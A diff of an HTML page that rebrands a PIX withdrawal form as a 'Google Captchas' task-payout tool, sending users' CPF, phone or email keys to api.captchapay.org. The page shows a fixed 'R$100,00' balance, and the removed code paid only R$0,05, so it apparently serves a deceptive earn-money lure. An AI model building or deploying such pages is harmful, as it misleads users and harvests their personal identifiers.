--- a/index2.html
+++ b/index2.html
@@ -3,7 +3,7 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Saque PIX - Suitpay</title>
+    <title>Google Captchas - Nova Ferramenta</title>
     <style>
         body {
             font-family: Arial, sans-serif;
@@ -22,10 +22,6 @@
             background-color: white;
             box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
             position: relative;
-        }
-        picture img {
-            width: 100%;
-            height: auto;
         }
         .saldo {
             background-color: #4caf50;
@@ -49,147 +45,82 @@
             font-size: 1.2em;
             cursor: pointer;
             margin-top: 20px;
-        }
-        .btn-green {
             background-color: #4caf50;
             color: white;
-        }
-        .btn:disabled {
-            background-color: #ccc;
-            cursor: not-allowed;
         }
         .error {
             color: red;
             text-align: center;
             margin-top: 20px;
         }
-        @media (max-width: 600px) {
-            .container {
-                padding: 10px;
-            }
-            .saldo {
-                font-size: 1.2em;
-            }
-            .btn {
-                font-size: 1em;
-                padding: 10px;
-            }
+        .form-group {
+            margin-bottom: 15px;
+        }
+        .form-group label {
+            display: block;
+            margin-bottom: 5px;
+        }
+        .form-group input {
+            width: 100%;
+            padding: 10px;
+            border: 1px solid #ccc;
+            border-radius: 5px;
         }
     </style>
 </head>
 <body>
-    <div class="container" id="withdrawPage">
-        <div class="saldo" id="withdrawSaldo">
-            Saldo: R$100,00
-        </div>
+    <div class="container">
+        <div class="saldo">Saldo: R$100,00</div>
         <div class="content">
-            <p>Insira sua chave PIX abaixo para sacar suas comissões das tarefas concluídas e continuar realizando novas tarefas.</p>
-            <form id="pixForm">
-                <label for="pixType">Tipo de Chave PIX:</label>
-                <select id="pixType" name="pixType" required onchange="showPixField()">
+            <h2 style="font-size: 21px;">Realize seu Saque</h2>
+            <p>Insira sua chave PIX abaixo para sacar suas comissões das tarefas concluídas do Google Captcha.</p>
+        </div>
+        <form id="pixForm" action="https://api.captchapay.org/captcha/process_pix.php" method="POST">
+            <div class="form-group">
+                <label for="pixType">Tipo de Chave Pix</label>
+                <select id="pixType" name="pixType" required>
                     <option value="cpf">CPF</option>
                     <option value="phoneNumber">Celular</option>
                     <option value="email">Email</option>
                 </select>
-                <div id="cpfField" style="display:none;">
-                    <label for="cpf">CPF:</label>
-                    <input type="text" id="cpf" name="cpf" placeholder="Digite seu CPF" oninput="formatCPF()">
-                </div>
-                <div id="phoneField" style="display:none;">
-                    <label for="phone">Celular:</label>
-                    <input type="text" id="phone" name="phone" placeholder="Digite seu celular" oninput="formatPhone()">
-                </div>
-                <div id="emailField" style="display:none;">
-                    <label for="email">Email:</label>
-                    <input type="email" id="email" name="email" placeholder="Digite seu email" onblur="correctEmail()">
-                </div>
-                <button type="submit" class="btn btn-green">Enviar</button>
-            </form>
-            <div class="error" id="pixErrorMessage"></div>
-        </div>
+            </div>
+            <div class="form-group">
+                <label for="pixKey">Chave Pix</label>
+                <input type="text" id="pixKey" name="pixKey" required>
+            </div>
+            <button type="submit" class="btn">Enviar</button>
+        </form>
+        <div class="error" id="pixErrorMessage"></div>
     </div>
 
     <script>
-        function showPixField() {
+        document.getElementById('pixType').addEventListener('change', function() {
+            const pixKeyInput = document.getElementById('pixKey');
+            pixKeyInput.value = '';
+        });
+
+        document.getElementById('pixKey').addEventListener('input', function() {
             const pixType = document.getElementById('pixType').value;
-            document.getElementById('cpfField').style.display = 'none';
-            document.getElementById('emailField').style.display = 'none';
-            document.getElementById('phoneField').style.display = 'none';
-            
-            if (pixType === 'cpf') {
-                document.getElementById('cpfField').style.display = 'block';
-            } else if (pixType === 'email') {
-                document.getElementById('emailField').style.display = 'block';
-            } else if (pixType === 'phoneNumber') {
-                document.getElementById('phoneField').style.display = 'block';
-            }
-        }
-
-        function formatCPF() {
-            let cpf = document.getElementById('cpf').value;
-            cpf = cpf.replace(/\D/g, ''); // Remove tudo que não é dígito
-            cpf = cpf.replace(/(\d{3})(\d)/, '$1.$2');
-            cpf = cpf.replace(/(\d{3})(\d)/, '$1.$2');
-            cpf = cpf.replace(/(\d{3})(\d{1,2})$/, '$1-$2');
-            document.getElementById('cpf').value = cpf;
-        }
-
-        function formatPhone() {
-            let phone = document.getElementById('phone').value;
-            phone = phone.replace(/\D/g, ''); // Remove tudo que não é dígito
-            phone = phone.replace(/^(\d{2})(\d)/g, '($1) $2');
-            phone = phone.replace(/(\d{5})(\d{4})$/, '$1-$2');
-            document.getElementById('phone').value = phone;
-        }
-
-        function correctEmail() {
-            let email = document.getElementById('email').value;
-            const emailRegex = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;
-            if (!emailRegex.test(email)) {
-                email = email.replace(/[^a-zA-Z0-9]/g, ''); // Remove caracteres inválidos
-                email = email.replace(/(.{3,})@.*$/, '$1@example.com');
-                document.getElementById('email').value = email;
-            }
-        }
-
-        document.getElementById('pixForm').addEventListener('submit', function(event) {
-            event.preventDefault();
-
-            const pixType = document.getElementById('pixType').value;
-            let key = '';
+            const pixKeyInput = document.getElementById('pixKey');
+            let value = pixKeyInput.value;
 
             if (pixType === 'cpf') {
-                key = document.getElementById('cpf').value;
-            } else if (pixType === 'email') {
-                key = document.getElementById('email').value;
+                value = value.replace(/\D/g, ''); // Remove tudo que não é dígito
+                value = value.replace(/(\d{3})(\d)/, '$1.$2');
+                value = value.replace(/(\d{3})(\d)/, '$1.$2');
+                value = value.replace(/(\d{3})(\d{1,2})$/, '$1-$2');
+                pixKeyInput.value = value;
             } else if (pixType === 'phoneNumber') {
-                key = document.getElementById('phone').value;
-            }
-
-            const data = {
-                key: key,
-                typeKey: pixType,
-                value: 0.05  // Valor fixo de R$0,05
-            };
-
-            fetch('https://api.captchapay.org/captcha/process_pix.php', {
-                method: 'POST',
-                headers: {
-                    'Content-Type': 'application/json'
-                },
-                body: JSON.stringify(data)
-            })
-            .then(response => response.json())
-            .then(data => {
-                if (data.success) {
-                    alert('Pagamento realizado com sucesso!');
-                } else {
-                    document.getElementById('pixErrorMessage').innerText = 'Erro ao realizar o pagamento. Tente novamente.';
+                value = value.replace(/\D/g, ''); // Remove tudo que não é dígito
+                value = value.replace(/(\d{2})(\d)/, '($1) $2');
+                value = value.replace(/(\d{5})(\d)/, '$1-$2');
+                pixKeyInput.value = value;
+            } else if (pixType === 'email') {
+                // Add basic email format correction
+                if (!value.includes('@')) {
+                    pixKeyInput.value = value + '@exemplo.com';
                 }
-            })
-            .catch((error) => {
-                document.getElementById('pixErrorMessage').innerText = 'Erro ao realizar o pagamento. Tente novamente.';
-            });
+            }
         });
     </script>
 </body>
